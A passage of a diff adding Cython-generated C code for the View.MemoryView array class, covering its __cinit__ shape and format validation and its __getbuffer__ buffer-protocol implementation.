__pyx_t_9; + Py_UCS4 __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + __Pyx_INCREF(__pyx_v_format); + + /* "View.MemoryView":137 + * cdef Py_ssize_t dim + * + * self.ndim = len(shape) # <<<<<<<<<<<<<< + * self.itemsize = itemsize + * + */ + if (unlikely(__pyx_v_shape == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 137, __pyx_L1_error) + } + __pyx_t_1 = PyTuple_GET_SIZE(__pyx_v_shape); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(1, 137, __pyx_L1_error) + __pyx_v_self->ndim = ((int)__pyx_t_1); + + /* "View.MemoryView":138 + * + * self.ndim = len(shape) + * self.itemsize = itemsize # <<<<<<<<<<<<<< + * + * if not self.ndim: + */ + __pyx_v_self->itemsize = __pyx_v_itemsize; + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + __pyx_t_2 = (!(__pyx_v_self->ndim != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":141 + * + * if not self.ndim: + * raise ValueError, "Empty shape tuple for cython.array" # <<<<<<<<<<<<<< + * + * if itemsize <= 0: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Empty_shape_tuple_for_cython_arr, 0, 0); + __PYX_ERR(1, 141, __pyx_L1_error) + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + } + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + __pyx_t_2 = (__pyx_v_itemsize <= 0); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":144 + * + * if itemsize <= 0: + * raise ValueError, "itemsize <= 0 for cython.array" # <<<<<<<<<<<<<< + * + * if not isinstance(format, bytes): + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_itemsize_0_for_cython_array, 0, 0); + __PYX_ERR(1, 144, __pyx_L1_error) + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + } + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + __pyx_t_2 = PyBytes_Check(__pyx_v_format); + __pyx_t_3 = (!__pyx_t_2); + if (__pyx_t_3) { + + /* "View.MemoryView":147 + * + * if not isinstance(format, bytes): + * format = format.encode('ASCII') # <<<<<<<<<<<<<< + * self._format = format # keep a reference to the byte string + * self.format = self._format + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_format, __pyx_n_s_encode); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_n_s_ASCII}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __Pyx_DECREF_SET(__pyx_v_format, __pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + } + + /* "View.MemoryView":148 + * if not isinstance(format, bytes): + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string # <<<<<<<<<<<<<< + * self.format = self._format + * + */ + if (!(likely(PyBytes_CheckExact(__pyx_v_format))||((__pyx_v_format) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_v_format))) __PYX_ERR(1, 148, __pyx_L1_error) + __pyx_t_4 = __pyx_v_format; + __Pyx_INCREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __Pyx_GOTREF(__pyx_v_self->_format); + __Pyx_DECREF(__pyx_v_self->_format); + __pyx_v_self->_format = ((PyObject*)__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":149 + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + * self.format = self._format # <<<<<<<<<<<<<< + * + * + */ + if (unlikely(__pyx_v_self->_format == Py_None)) { + PyErr_SetString(PyExc_TypeError, "expected bytes, NoneType found"); + __PYX_ERR(1, 149, __pyx_L1_error) + } + __pyx_t_8 = __Pyx_PyBytes_AsWritableString(__pyx_v_self->_format); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(1, 149, __pyx_L1_error) + __pyx_v_self->format = __pyx_t_8; + + /* "View.MemoryView":152 + * + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) # <<<<<<<<<<<<<< + * self._strides = self._shape + self.ndim + * + */ + __pyx_v_self->_shape = ((Py_ssize_t *)PyObject_Malloc((((sizeof(Py_ssize_t)) * __pyx_v_self->ndim) * 2))); + + /* "View.MemoryView":153 + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) + * self._strides = self._shape + self.ndim # <<<<<<<<<<<<<< + * + * if not self._shape: + */ + __pyx_v_self->_strides = (__pyx_v_self->_shape + __pyx_v_self->ndim); + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + __pyx_t_3 = (!(__pyx_v_self->_shape != 0)); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":156 + * + * if not self._shape: + * raise MemoryError, "unable to allocate shape and strides." # <<<<<<<<<<<<<< + * + * + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_shape_and_str, 0, 0); + __PYX_ERR(1, 156, __pyx_L1_error) + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + } + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + __pyx_t_7 = 0; + __pyx_t_4 = __pyx_v_shape; __Pyx_INCREF(__pyx_t_4); __pyx_t_1 = 0; + for (;;) { + if (__pyx_t_1 >= PyTuple_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_5); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(1, 159, __pyx_L1_error) + #else + __pyx_t_5 = PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + #endif + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_5); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 159, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_dim = __pyx_t_9; + __pyx_v_idx = __pyx_t_7; + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + __pyx_t_3 = (__pyx_v_dim <= 0); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":161 + * for idx, dim in enumerate(shape): + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." # <<<<<<<<<<<<<< + * self._shape[idx] = dim + * + */ + __pyx_t_5 = PyTuple_New(5); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_9 = 0; + __pyx_t_10 = 127; + __Pyx_INCREF(__pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_9 += 22; + __Pyx_GIVEREF(__pyx_kp_u_Invalid_shape_in_axis); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_Invalid_shape_in_axis); + __pyx_t_6 = __Pyx_PyUnicode_From_int(__pyx_v_idx, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u_); + __pyx_t_9 += 2; + __Pyx_GIVEREF(__pyx_kp_u_); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u_); + __pyx_t_6 = __Pyx_PyUnicode_From_Py_ssize_t(__pyx_v_dim, 0, ' ', 'd'); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_9 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u__2); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__2); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u__2); + __pyx_t_6 = __Pyx_PyUnicode_Join(__pyx_t_5, 5, __pyx_t_9, __pyx_t_10); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 161, __pyx_L1_error) + + /* "View.MemoryView":160 + * + * for idx, dim in enumerate(shape): + * if dim <= 0: # <<<<<<<<<<<<<< + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim + */ + } + + /* "View.MemoryView":162 + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + * self._shape[idx] = dim # <<<<<<<<<<<<<< + * + * cdef char order + */ + (__pyx_v_self->_shape[__pyx_v_idx]) = __pyx_v_dim; + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_c, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 165, __pyx_L1_error) + if (__pyx_t_3) { + + /* "View.MemoryView":166 + * cdef char order + * if mode == 'c': + * order = b'C' # <<<<<<<<<<<<<< + * self.mode = u'c' + * elif mode == 'fortran': + */ + __pyx_v_order = 'C'; + + /* "View.MemoryView":167 + * if mode == 'c': + * order = b'C' + * self.mode = u'c' # <<<<<<<<<<<<<< + * elif mode == 'fortran': + * order = b'F' + */ + __Pyx_INCREF(__pyx_n_u_c); + __Pyx_GIVEREF(__pyx_n_u_c); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_c; + + /* "View.MemoryView":165 + * + * cdef char order + * if mode == 'c': # <<<<<<<<<<<<<< + * order = b'C' + * self.mode = u'c' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + __pyx_t_3 = (__Pyx_PyString_Equals(__pyx_v_mode, __pyx_n_s_fortran, Py_EQ)); if (unlikely((__pyx_t_3 < 0))) __PYX_ERR(1, 168, __pyx_L1_error) + if (likely(__pyx_t_3)) { + + /* "View.MemoryView":169 + * self.mode = u'c' + * elif mode == 'fortran': + * order = b'F' # <<<<<<<<<<<<<< + * self.mode = u'fortran' + * else: + */ + __pyx_v_order = 'F'; + + /* "View.MemoryView":170 + * elif mode == 'fortran': + * order = b'F' + * self.mode = u'fortran' # <<<<<<<<<<<<<< + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + */ + __Pyx_INCREF(__pyx_n_u_fortran); + __Pyx_GIVEREF(__pyx_n_u_fortran); + __Pyx_GOTREF(__pyx_v_self->mode); + __Pyx_DECREF(__pyx_v_self->mode); + __pyx_v_self->mode = __pyx_n_u_fortran; + + /* "View.MemoryView":168 + * order = b'C' + * self.mode = u'c' + * elif mode == 'fortran': # <<<<<<<<<<<<<< + * order = b'F' + * self.mode = u'fortran' + */ + goto __pyx_L11; + } + + /* "View.MemoryView":172 + * self.mode = u'fortran' + * else: + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" # <<<<<<<<<<<<<< + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + */ + /*else*/ { + __pyx_t_4 = __Pyx_PyObject_FormatSimple(__pyx_v_mode, __pyx_empty_unicode); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __Pyx_PyUnicode_Concat(__pyx_kp_u_Invalid_mode_expected_c_or_fortr, __pyx_t_4); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 172, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_t_6, 0, 0); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __PYX_ERR(1, 172, __pyx_L1_error) + } + __pyx_L11:; + + /* "View.MemoryView":174 + * raise ValueError, f"Invalid mode, expected 'c' or 'fortran', got {mode}" + * + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) # <<<<<<<<<<<<<< + * + * self.free_data = allocate_buffer + */ + __pyx_v_self->len = __pyx_fill_contig_strides_array(__pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_itemsize, __pyx_v_self->ndim, __pyx_v_order); + + /* "View.MemoryView":176 + * self.len = fill_contig_strides_array(self._shape, self._strides, itemsize, self.ndim, order) + * + * self.free_data = allocate_buffer # <<<<<<<<<<<<<< + * self.dtype_is_object = format == b'O' + * + */ + __pyx_v_self->free_data = __pyx_v_allocate_buffer; + + /* "View.MemoryView":177 + * + * self.free_data = allocate_buffer + * self.dtype_is_object = format == b'O' # <<<<<<<<<<<<<< + * + * if allocate_buffer: + */ + __pyx_t_6 = PyObject_RichCompare(__pyx_v_format, __pyx_n_b_O, Py_EQ); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 177, __pyx_L1_error) + __pyx_t_3 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 177, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_v_self->dtype_is_object = __pyx_t_3; + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + if (__pyx_v_allocate_buffer) { + + /* "View.MemoryView":180 + * + * if allocate_buffer: + * _allocate_buffer(self) # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_t_7 = __pyx_array_allocate_buffer(__pyx_v_self); if (unlikely(__pyx_t_7 == ((int)-1))) __PYX_ERR(1, 180, __pyx_L1_error) + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + } + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_format); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(((struct __pyx_array_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_v_bufmode; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + char *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + Py_ssize_t *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":184 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 # <<<<<<<<<<<<<< + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + */ + __pyx_v_bufmode = -1; + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_t_1 = ((__pyx_v_flags & ((PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS) | PyBUF_ANY_CONTIGUOUS)) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_c, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 186, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":187 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_v_bufmode = (PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + goto __pyx_L4; + } + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_fortran, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 188, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":189 + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + */ + __pyx_v_bufmode = (PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + } + __pyx_L4:; + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + __pyx_t_1 = (!((__pyx_v_flags & __pyx_v_bufmode) != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":191 + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." # <<<<<<<<<<<<<< + * info.buf = self.data + * info.len = self.len + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Can_only_create_a_buffer_that_is, 0, 0); + __PYX_ERR(1, 191, __pyx_L1_error) + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + } + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + } + + /* "View.MemoryView":192 + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data # <<<<<<<<<<<<<< + * info.len = self.len + * + */ + __pyx_t_2 = __pyx_v_self->data; + __pyx_v_info->buf = __pyx_t_2; + + /* "View.MemoryView":193 + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + * info.len = self.len # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + __pyx_t_3 = __pyx_v_self->len; + __pyx_v_info->len = __pyx_t_3; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":196 + * + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim # <<<<<<<<<<<<<< + * info.shape = self._shape + * info.strides = self._strides + */ + __pyx_t_4 = __pyx_v_self->ndim; + __pyx_v_info->ndim = __pyx_t_4; + + /* "View.MemoryView":197 + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim + * info.shape = self._shape # <<<<<<<<<<<<<< + * info.strides = self._strides + * else: + */ + __pyx_t_5 = __pyx_v_self->_shape; + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":198 + * info.ndim = self.ndim + * info.shape = self._shape + * info.strides = self._strides # <<<<<<<<<<<<<< + * else: + * info.ndim = 1 + */ + __pyx_t_5 = __pyx_v_self->_strides; + __pyx_v_info->strides = __pyx_t_5; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + goto __pyx_L6; + } + + /* "View.MemoryView":200 + * info.strides = self._strides + * else: + * info.ndim = 1 # <<<<<<<<<<<<<< + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL + */ + /*else*/ { + __pyx_v_info->ndim = 1; + + /* "View.MemoryView":201 + * else: + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL # <<<<<<<<<<<<<< + * info.strides = NULL + * + */ + if (((__pyx_v_flags & PyBUF_ND) != 0)) { + __pyx_t_5 = (&__pyx_v_self->len); + } else { + __pyx_t_5 = NULL; + } + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":202 + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL # <<<<<<<<<<<<<< + * + * info.suboffsets = NULL + */ + __pyx_v_info->strides = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":204 + * info.strides = NULL + * + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * info.itemsize = self.itemsize + * info.readonly = 0 + */ + __pyx_v_info->suboffsets = NULL; + + /* "View.MemoryView":205 + * + * info.suboffsets = NULL + * info.itemsize = self.itemsize # <<<<<<<<<<<<<< + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + */ + __pyx_t_3 = __pyx_v_self->itemsize; + __pyx_v_info->itemsize = __pyx_t_3; + + /* "View.MemoryView":206 + * info.suboffsets = NULL + * info.itemsize = self.itemsize + * info.readonly = 0 # <<<<<<<<<<<<<< + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self + */ + __pyx_v_info->readonly = 0; + + /* "View.MemoryView":207 + * info.itemsize = self.itemsize + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL # <<<<<<<<<<<<<< + * info.obj = self + * + */ + if (((__pyx_v_flags & PyBUF_FORMAT) != 0)) { + __pyx_t_2 = __pyx_v_self->format; + } else { + __pyx_t_2 = NULL; + } + __pyx_v_info->format = __pyx_t_2; + + /* "View.MemoryView":208 + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self # <<<<<<<<<<<<<< + * + * def __dealloc__(array self): + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject 